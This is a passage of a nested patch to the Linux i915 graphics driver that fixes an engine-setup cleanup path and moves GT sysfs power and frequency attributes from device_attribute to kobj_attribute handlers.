+ 	old = xa_erase(&file_priv->proto_context_xa, id);
+ 	GEM_BUG_ON(old != pc);
+ 	proto_context_close(file_priv->dev_priv, pc);
+ 
+-	/* One for the xarray and one for the caller */
+-	return i915_gem_context_get(ctx);
++	return ctx;
+ }
+ 
+ struct i915_gem_context *
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index 83bfeb872bdaa..fcbccd8d244e9 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -1343,8 +1343,13 @@ int intel_engines_init(struct intel_gt *gt)
+ 			return err;
+ 
+ 		err = setup(engine);
+-		if (err)
++		if (err) {
++			intel_engine_cleanup_common(engine);
+ 			return err;
++		}
++
++		/* The backend should now be responsible for cleanup */
++		GEM_BUG_ON(engine->release == NULL);
+ 
+ 		err = engine_init_common(engine);
+ 		if (err)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
+index d651ccd0ab20b..9486dd3bed991 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
+@@ -22,11 +22,9 @@ bool is_object_gt(struct kobject *kobj)
+ 	return !strncmp(kobj->name, "gt", 2);
+ }
+ 
+-struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
++struct intel_gt *intel_gt_sysfs_get_drvdata(struct kobject *kobj,
+ 					    const char *name)
+ {
+-	struct kobject *kobj = &dev->kobj;
+-
+ 	/*
+ 	 * We are interested at knowing from where the interface
+ 	 * has been called, whether it's called from gt/ or from
+@@ -38,6 +36,7 @@ struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
+ 	 * "struct drm_i915_private *" type.
+ 	 */
+ 	if (!is_object_gt(kobj)) {
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		return to_gt(i915);
+@@ -51,18 +50,18 @@ static struct kobject *gt_get_parent_obj(struct intel_gt *gt)
+ 	return &gt->i915->drm.primary->kdev->kobj;
+ }
+ 
+-static ssize_t id_show(struct device *dev,
+-		       struct device_attribute *attr,
++static ssize_t id_show(struct kobject *kobj,
++		       struct kobj_attribute *attr,
+ 		       char *buf)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 
+ 	return sysfs_emit(buf, "%u\n", gt->info.id);
+ }
+-static DEVICE_ATTR_RO(id);
++static struct kobj_attribute attr_id = __ATTR_RO(id);
+ 
+ static struct attribute *id_attrs[] = {
+-	&dev_attr_id.attr,
++	&attr_id.attr,
+ 	NULL,
+ };
+ ATTRIBUTE_GROUPS(id);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
+index 6232923a420d0..c3a123faee987 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
+@@ -30,7 +30,7 @@ static inline struct intel_gt *kobj_to_gt(struct kobject *kobj)
+ 
+ void intel_gt_sysfs_register(struct intel_gt *gt);
+ void intel_gt_sysfs_unregister(struct intel_gt *gt);
+-struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
++struct intel_gt *intel_gt_sysfs_get_drvdata(struct kobject *kobj,
+ 					    const char *name);
+ 
+ #endif /* SYSFS_GT_H */
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c b/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
+index 180dd6f3ef571..b108f0a8a044c 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
+@@ -24,14 +24,15 @@ enum intel_gt_sysfs_op {
+ };
+ 
+ static int
+-sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
++sysfs_gt_attribute_w_func(struct kobject *kobj, struct attribute *attr,
+ 			  int (func)(struct intel_gt *gt, u32 val), u32 val)
+ {
+ 	struct intel_gt *gt;
+ 	int ret;
+ 
+-	if (!is_object_gt(&dev->kobj)) {
++	if (!is_object_gt(kobj)) {
+ 		int i;
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		for_each_gt(gt, i915, i) {
+@@ -40,7 +41,7 @@ sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
+ 				break;
+ 		}
+ 	} else {
+-		gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++		gt = intel_gt_sysfs_get_drvdata(kobj, attr->name);
+ 		ret = func(gt, val);
+ 	}
+ 
+@@ -48,7 +49,7 @@ sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
+ }
+ 
+ static u32
+-sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
++sysfs_gt_attribute_r_func(struct kobject *kobj, struct attribute *attr,
+ 			  u32 (func)(struct intel_gt *gt),
+ 			  enum intel_gt_sysfs_op op)
+ {
+@@ -57,8 +58,9 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ 
+ 	ret = (op == INTEL_GT_SYSFS_MAX) ? 0 : (u32) -1;
+ 
+-	if (!is_object_gt(&dev->kobj)) {
++	if (!is_object_gt(kobj)) {
+ 		int i;
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		for_each_gt(gt, i915, i) {
+@@ -77,7 +79,7 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ 			}
+ 		}
+ 	} else {
+-		gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++		gt = intel_gt_sysfs_get_drvdata(kobj, attr->name);
+ 		ret = func(gt);
+ 	}
+ 
+@@ -92,6 +94,76 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ #define sysfs_gt_attribute_r_max_func(d, a, f) \
+ 		sysfs_gt_attribute_r_func(d, a, f, INTEL_GT_SYSFS_MAX)
+ 
++#define INTEL_GT_SYSFS_SHOW(_name, _attr_type)							\
++	static ssize_t _name##_show_common(struct kobject *kobj,				\
++					   struct attribute *attr, char *buff)			\
++	{											\
++		u32 val = sysfs_gt_attribute_r_##_attr_type##_func(kobj, attr,			\
++								   __##_name##_show);		\
++												\
++		return sysfs_emit(buff, "%u\n", val);						\
++	}											\
++	static ssize_t _name##_show(struct kobject *kobj,					\
++				    struct kobj_attribute *attr, char *buff)			\
++	{											\
++		return _name ##_show_common(kobj, &attr->attr, buff);				\
++	}											\
++	static ssize_t _name##_dev_show(struct device *dev,					\
++					struct device_attribute *attr, char *buff)		\
++	{											\
++		return _name##_show_common(&dev->kobj, &attr->attr, buff);			\
++	}
++
++#define INTEL_GT_SYSFS_STORE(_name, _func)						\
++	static ssize_t _name##_store_common(struct kobject *kobj,			\
++					    struct attribute *attr,			\
++					    const char *buff, size_t count)		\
++	{										\
++		int ret;								\
++		u32 val;								\
++											\
++		ret = kstrtou32(buff, 0, &val);						\
++		if (ret)								\
++			return ret;							\
++											\
++		ret = sysfs_gt_attribute_w_func(kobj, attr, _func, val);		\
++											\
++		return ret ?: count;							\
++	}										\
++	static ssize_t _name##_store(struct kobject *kobj,				\
++				     struct kobj_attribute *attr, const char *buff,	\
++				     size_t count)					\
++	{										\
++		return _name##_store_common(kobj, &attr->attr, buff, count);		\
++	}										\
++	static ssize_t _name##_dev_store(struct device *dev,				\
++					 struct device_attribute *attr,			\
++					 const char *buff, size_t count)		\
++	{										\
++		return _name##_store_common(&dev->kobj, &attr->attr, buff, count);	\
++	}
++
++#define INTEL_GT_SYSFS_SHOW_MAX(_name) INTEL_GT_SYSFS_SHOW(_name, max)
++#define INTEL_GT_SYSFS_SHOW_MIN(_name) INTEL_GT_SYSFS_SHOW(_name, min)
++
++#define INTEL_GT_ATTR_RW(_name) \
++	static struct kobj_attribute attr_##_name = __ATTR_RW(_name)
++
++#define INTEL_GT_ATTR_RO(_name) \
++	static struct kobj_attribute attr_##_name = __ATTR_RO(_name)
++
++#define INTEL_GT_DUAL_ATTR_RW(_name) \
++	static struct device_attribute dev_attr_##_name = __ATTR(_name, 0644,		\
++								 _name##_dev_show,	\
++								 _name##_dev_store);	\
++	INTEL_GT_ATTR_RW(_name)
++
++#define INTEL_GT_DUAL_ATTR_RO(_name) \
++	static struct device_attribute dev_attr_##_name = __ATTR(_name, 0444,		\
++								 _name##_dev_show,	\
++								 NULL);			\
++	INTEL_GT_ATTR_RO(_name)
++
+ #ifdef CONFIG_PM
+ static u32 get_residency(struct intel_gt *gt, i915_reg_t reg)
+ {
+@@ -104,11 +176,8 @@ static u32 get_residency(struct intel_gt *gt, i915_reg_t reg)
+ 	return DIV_ROUND_CLOSEST_ULL(res, 1000);
+ }
+ 
+-static ssize_t rc6_enable_show(struct device *dev,
+-			       struct device_attribute *attr,
+-			       char *buff)
++static u8 get_rc6_mask(struct intel_gt *gt)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
+ 	u8 mask = 0;
+ 
+ 	if (HAS_RC6(gt->i915))
+@@ -118,37 +187,35 @@ static ssize_t rc6_enable_show(struct device *dev,
+ 	if (HAS_RC6pp(gt->i915))
+ 		mask |= BIT(2);
+ 
+-	return sysfs_emit(buff, "%x\n", mask);
++	return mask;
+ }
+ 
+-static u32 __rc6_residency_ms_show(struct intel_gt *gt)
++static ssize_t rc6_enable_show(struct kobject *kobj,
++			       struct kobj_attribute *attr,
++			       char *buff)
+ {
+-	return get_residency(gt, GEN6_GT_GFX_RC6);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
++
++	return sysfs_emit(buff, "%x\n", get_rc6_mask(gt));
+ }
+ 
+-static ssize_t rc6_residency_ms_show(struct device *dev,
+-				     struct device_attribute *attr,
+-				     char *buff)
++static ssize_t rc6_enable_dev_show(struct device *dev,
++				   struct device_attribute *attr,
++				   char *buff)
+ {
+-	u32 rc6_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						      __rc6_residency_ms_show);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(&dev->kobj, attr->attr.name);
+ 
+-	return sysfs_emit(buff, "%u\n", rc6_residency);
++	return sysfs_emit(buff, "%x\n", get_rc6_mask(gt));
+ }
+ 
+-static u32 __rc6p_residency_ms_show(struct intel_gt *gt)
++static u32 __rc6_residency_ms_show(struct intel_gt *gt)
+ {
+-	return get_residency(gt, GEN6_GT_GFX_RC6p);
++	return get_residency(gt, GEN6_GT_GFX_RC6);
+ }
+ 
+-static ssize_t rc6p_residency_ms_show(struct device *dev,
+-				      struct device_attribute *attr,
+-				      char *buff)
++static u32 __rc6p_residency_ms_show(struct intel_gt *gt)
+ {
+-	u32 rc6p_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__rc6p_residency_ms_show);
+-
+-	return sysfs_emit(buff, "%u\n", rc6p_residency);
++	return get_residency(gt, GEN6_GT_GFX_RC6p);
+ }
+ 
+ static u32 __rc6pp_residency_ms_show(struct intel_gt *gt)
+@@ -156,67 +223,69 @@ static u32 __rc6pp_residency_ms_show(struct intel_gt *gt)
+ 	return get_residency(gt, GEN6_GT_GFX_RC6pp);
+ }
+ 
+-static ssize_t rc6pp_residency_ms_show(struct device *dev,
+-				       struct device_attribute *attr,
+-				       char *buff)
+-{
+-	u32 rc6pp_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__rc6pp_residency_ms_show);
+-
+-	return sysfs_emit(buff, "%u\n", rc6pp_residency);
+-}
+-
+ static u32 __media_rc6_residency_ms_show(struct intel_gt *gt)
+ {
+ 	return get_residency(gt, VLV_GT_MEDIA_RC6);
+ }
+ 
+-static ssize_t media_rc6_residency_ms_show(struct device *dev,
+-					   struct device_attribute *attr,
+-					   char *buff)
+-{
+-	u32 rc6_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__media_rc6_residency_ms_show);
++INTEL_GT_SYSFS_SHOW_MIN(rc6_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(rc6p_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(rc6pp_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(media_rc6_residency_ms);
+ 
+-	return sysfs_emit(buff, "%u\n", rc6_residency);
+-}
+-
+-static DEVICE_ATTR_RO(rc6_enable);
+-static DEVICE_ATTR_RO(rc6_residency_ms);
+-static DEVICE_ATTR_RO(rc6p_residency_ms);
+-static DEVICE_ATTR_RO(rc6pp_residency_ms);
+-static DEVICE_ATTR_RO(media_rc6_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6_enable);
++INTEL_GT_DUAL_ATTR_RO(rc6_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6p_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6pp_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(media_rc6_residency_ms);
+ 
+ static struct attribute *rc6_attrs[] = {
++	&attr_rc6_enable.attr,
++	&attr_rc6_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *rc6p_attrs[] = {
++	&attr_rc6p_residency_ms.attr,
++	&attr_rc6pp_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *media_rc6_attrs[] = {
++	&attr_media_rc6_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *rc6_dev_attrs[] = {
+ 	&dev_attr_rc6_enable.attr,
+ 	&dev_attr_rc6_residency_ms.attr,
+ 	NULL
+ };
+ 
+-static struct attribute *rc6p_attrs[] = {
++static struct attribute *rc6p_dev_attrs[] = {
+ 	&dev_attr_rc6p_residency_ms.attr,
+ 	&dev_attr_rc6pp_residency_ms.attr,
+ 	NULL
+ };
+ 
+-static struct attribute *media_rc6_attrs[] = {
++static struct attribute *media_rc6_dev_attrs[] = {
+ 	&dev_attr_media_rc6_residency_ms.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group rc6_attr_group[] = {
+ 	{ .attrs = rc6_attrs, },
+-	{ .name = power_group_name, .attrs = rc6_attrs, },
++	{ .name = power_group_name, .attrs = rc6_dev_attrs, },
+ };
+ 
+ static const struct attribute_group rc6p_attr_group[] = {
+ 	{ .attrs = rc6p_attrs, },
+-	{ .name = power_group_name, .attrs = rc6p_attrs, },
++	{ .name = power_group_name, .attrs = rc6p_dev_attrs, },
+ };
+ 
+ static const struct attribute_group media_rc6_attr_group[] = {
+ 	{ .attrs = media_rc6_attrs, },
+-	{ .name = power_group_name, .attrs = media_rc6_attrs, },
++	{ .name = power_group_name, .attrs = media_rc6_dev_attrs, },
+ };
+ 
+ static int __intel_gt_sysfs_create_group(struct kobject *kobj,
+@@ -271,104 +340,34 @@ static u32 __act_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_rps_read_actual_frequency(&gt->rps);
+ }
+ 
+-static ssize_t act_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 actual_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						    __act_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", actual_freq);
+-}
+-
+ static u32 __cur_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_requested_frequency(&gt->rps);
+ }
+ 
+-static ssize_t cur_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 cur_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						 __cur_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", cur_freq);
+-}
+-
+ static u32 __boost_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_boost_frequency(&gt->rps);
+ }
+ 
+-static ssize_t boost_freq_mhz_show(struct device *dev,
+-				   struct device_attribute *attr,
+-				   char *buff)
+-{
+-	u32 boost_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						   __boost_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", boost_freq);
+-}
+-
+ static int __boost_freq_mhz_store(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_boost_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t boost_freq_mhz_store(struct device *dev,
+-				    struct device_attribute *attr,
+-				    const char *buff, size_t count)
+-{
+-	ssize_t ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	return sysfs_gt_attribute_w_func(dev, attr,
+-					 __boost_freq_mhz_store, val) ?: count;
+-}
+-
+-static u32 __rp0_freq_mhz_show(struct intel_gt *gt)
++static u32 __RP0_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_rp0_frequency(&gt->rps);
+ }
+ 
+-static ssize_t RP0_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 rp0_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rp0_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rp0_freq);
+-}
+-
+-static u32 __rp1_freq_mhz_show(struct intel_gt *gt)
+-{
+-	return intel_rps_get_rp1_frequency(&gt->rps);
+-}
+-
+-static ssize_t RP1_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 rp1_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rp1_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rp1_freq);
+-}
+-
+-static u32 __rpn_freq_mhz_show(struct intel_gt *gt)
++static u32 __RPn_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_rpn_frequency(&gt->rps);
+ }
+ 
+-static ssize_t RPn_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
++static u32 __RP1_freq_mhz_show(struct intel_gt *gt)
+ {
+-	u32 rpn_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rpn_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rpn_freq);
++	return intel_rps_get_rp1_frequency(&gt->rps);
+ }
+ 
+ static u32 __max_freq_mhz_show(struct intel_gt *gt)
+@@ -376,71 +375,21 @@ static u32 __max_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_rps_get_max_frequency(&gt->rps);
+ }
+ 
+-static ssize_t max_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 max_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __max_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", max_freq);
+-}
+-
+ static int __set_max_freq(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_max_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t max_freq_mhz_store(struct device *dev,
+-				  struct device_attribute *attr,
+-				  const char *buff, size_t count)
+-{
+-	int ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	ret = sysfs_gt_attribute_w_func(dev, attr, __set_max_freq, val);
+-
+-	return ret ?: count;
+-}
+-
+ static u32 __min_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_min_frequency(&gt->rps);
+ }
+ 
+-static ssize_t min_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 min_freq = sysfs_gt_attribute_r_min_func(dev, attr,
+-						     __min_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", min_freq);
+-}
+-
+ static int __set_min_freq(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_min_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t min_freq_mhz_store(struct device *dev,
+-				  struct device_attribute *attr,
+-				  const char *buff, size_t count)
+-{
+-	int ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	ret = sysfs_gt_attribute_w_func(dev, attr, __set_min_freq, val);
+-
+-	return ret ?: count;
+-}
+-
+ static u32 __vlv_rpe_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	struct intel_rps *rps = &gt->rps;
+@@ -448,23 +397,31 @@ static u32 __vlv_rpe_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_gpu_freq(rps, rps->efficient_freq);
+ }
+ 
+-static ssize_t vlv_rpe_freq_mhz_show(struct device *dev,
+-				     struct device_attribute *attr, char *buff)
+-{
+-	u32 rpe_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						 __vlv_rpe_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rpe_freq);
+-}
+-
+-#define INTEL_GT_RPS_SYSFS_ATTR(_name, _mode, _show, _store) \
+-	static struct device_attribute dev_attr_gt_##_name = __ATTR(gt_##_name, _mode, _show, _store); \
+-	static struct device_attribute dev_attr_rps_##_name = __ATTR(rps_##_name, _mode, _show, _store)
+-
+-#define INTEL_GT_RPS_SYSFS_ATTR_RO(_name)				\
+-		INTEL_GT_RPS_SYSFS_ATTR(_name, 0444, _name##_show, NULL)
+-#define INTEL_GT_RPS_SYSFS_ATTR_RW(_name)				\
+-		INTEL_GT_RPS_SYSFS_ATTR(_name, 0644, _name##_show, _name##_store)
++INTEL_GT_SYSFS_SHOW_MAX(act_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(boost_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(cur_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RP0_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RP1_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RPn_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(max_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MIN(min_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(vlv_rpe_freq_mhz);
++INTEL_GT_SYSFS_STORE(boost_freq_mhz, __boost_freq_mhz_store);
++INTEL_GT_SYSFS_STORE(max_freq_mhz, __set_max_freq);
++INTEL_GT_SYSFS_STORE(min_freq_mhz, __set_min_freq);
++
++#define INTEL_GT_RPS_SYSFS_ATTR(_name, _mode, _show, _store, _show_dev, _store_dev)		\
++	static struct device_attribute dev_attr_gt_##_name = __ATTR(gt_##_name, _mode,		\
++								    _show_dev, _store_dev);	\
++	static struct kobj_attribute attr_rps_##_name = __ATTR(rps_##_name, _mode,		\
++							       _show, _store)
++
++#define INTEL_GT_RPS_SYSFS_ATTR_RO(_name)						\
++		INTEL_GT_RPS_SYSFS_ATTR(_name, 0444, _name##_show, NULL,		\
++					_name##_dev_show, NULL)
++#define INTEL_GT_RPS_SYSFS_ATTR_RW(_name)						\
++		INTEL_GT_RPS_SYSFS_ATTR(_name, 0644, _name##_show, _name##_store,	\
++					_name##_dev_show, _name##_dev_store)
+ 
+ /* The below macros generate static structures */
+ INTEL_GT_RPS_SYSFS_ATTR_RO(act_freq_mhz);
+@@ -475,32 +432,31 @@ INTEL_GT_RPS_SYSFS_ATTR_RO(RP1_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RO(RPn_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RW(max_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RW(min_freq_mhz);
+-
+-static DEVICE_ATTR_RO(vlv_rpe_freq_mhz);
+-
+-#define GEN6_ATTR(s) { \
+-		&dev_attr_##s##_act_freq_mhz.attr, \
+-		&dev_attr_##s##_cur_freq_mhz.attr, \
+-		&dev_attr_##s##_boost_freq_mhz.attr, \
+-		&dev_attr_##s##_max_freq_mhz.attr, \
+-		&dev_attr_##s##_min_freq_mhz.attr, \
+-		&dev_attr_##s##_RP0_freq_mhz.attr, \
+-		&dev_attr_##s##_RP1_freq_mhz.attr, \
+-		&dev_attr_##s##_RPn_freq_mhz.attr, \
++INTEL_GT_RPS_SYSFS_ATTR_RO(vlv_rpe_freq_mhz);
++
++#define GEN6_ATTR(p, s) { \
++		&p##attr_##s##_act_freq_mhz.attr, \
++		&p##attr_##s##_cur_freq_mhz.attr, \
++		&p##attr_##s##_boost_freq_mhz.attr, \
++		&p##attr_##s##_max_freq_mhz.attr, \
++		&p##attr_##s##_min_freq_mhz.attr, \
++		&p##attr_##s##_RP0_freq_mhz.attr, \
++		&p##attr_##s##_RP1_freq_mhz.attr, \
++		&p##attr_##s##_RPn_freq_mhz.attr, \
+ 		NULL, \
+ 	}
+ 
+-#define GEN6_RPS_ATTR GEN6_ATTR(rps)
+-#define GEN6_GT_ATTR  GEN6_ATTR(gt)
++#define GEN6_RPS_ATTR GEN6_ATTR(, rps)
++#define GEN6_GT_ATTR  GEN6_ATTR(dev_, gt)
+ 
+ static const struct attribute * const gen6_rps_attrs[] = GEN6_RPS_ATTR;
+ static const struct attribute * const gen6_gt_attrs[]  = GEN6_GT_ATTR;
+ 
+-static ssize_t punit_req_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t punit_req_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 preq = intel_rps_read_punit_req_frequency(&gt->rps);
+ 
+ 	return sysfs_emit(buff, "%u\n", preq);
+@@ -508,17 +464,17 @@ static ssize_t punit_req_freq_mhz_show(struct device *dev,
+ 
+ struct intel_gt_bool_throttle_attr {
+ 	struct attribute attr;
+-	ssize_t (*show)(struct device *dev, struct device_attribute *attr,
++	ssize_t (*show)(struct kobject *kobj, struct kobj_attribute *attr,
+ 			char *buf);
+ 	i915_reg_t reg32;
+ 	u32 mask;
+ };
+ 
+-static ssize_t throttle_reason_bool_show(struct device *dev,
+-					 struct device_attribute *attr,
++static ssize_t throttle_reason_bool_show(struct kobject *kobj,
++					 struct kobj_attribute *attr,
+ 					 char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_gt_bool_throttle_attr *t_attr =
+ 				(struct intel_gt_bool_throttle_attr *) attr;
+ 	bool val = rps_read_mask_mmio(&gt->rps, t_attr->reg32, t_attr->mask);
+@@ -534,7 +490,7 @@ struct intel_gt_bool_throttle_attr attr_##sysfs_func__ = { \
+ 	.mask = mask__, \
+ }
+ 
+-static DEVICE_ATTR_RO(punit_req_freq_mhz);
++INTEL_GT_ATTR_RO(punit_req_freq_mhz);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_status, GT0_PERF_LIMIT_REASONS_MASK);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_pl1, POWER_LIMIT_1_MASK);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_pl2, POWER_LIMIT_2_MASK);
+@@ -597,8 +553,8 @@ static const struct attribute *throttle_reason_attrs[] = {
+ #define U8_8_VAL_MASK           0xffff
+ #define U8_8_SCALE_TO_VALUE     "0.00390625"
+ 
+-static ssize_t freq_factor_scale_show(struct device *dev,
+-				      struct device_attribute *attr,
++static ssize_t freq_factor_scale_show(struct kobject *kobj,
++				      struct kobj_attribute *attr,
+ 				      char *buff)
+ {
+ 	return sysfs_emit(buff, "%s\n", U8_8_SCALE_TO_VALUE);
+@@ -610,11 +566,11 @@ static u32 media_ratio_mode_to_factor(u32 mode)
+ 	return !mode ? mode : 256 / mode;
+ }
+ 
+-static ssize_t media_freq_factor_show(struct device *dev,
+-				      struct device_attribute *attr,
++static ssize_t media_freq_factor_show(struct kobject *kobj,
++				      struct kobj_attribute *attr,
+ 				      char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_guc_slpc *slpc = &gt->uc.guc.slpc;
+ 	intel_wakeref_t wakeref;
+ 	u32 mode;
+@@ -641,11 +597,11 @@ static ssize_t media_freq_factor_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", media_ratio_mode_to_factor(mode));
+ }
+ 
+-static ssize_t media_freq_factor_store(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_freq_factor_store(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       const char *buff, size_t count)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_guc_slpc *slpc = &gt->uc.guc.slpc;
+ 	u32 factor, mode;
+ 	int err;
+@@ -670,11 +626,11 @@ static ssize_t media_freq_factor_store(struct device *dev,
+ 	return err ?: count;
+ }
+ 
+-static ssize_t media_RP0_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_RP0_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
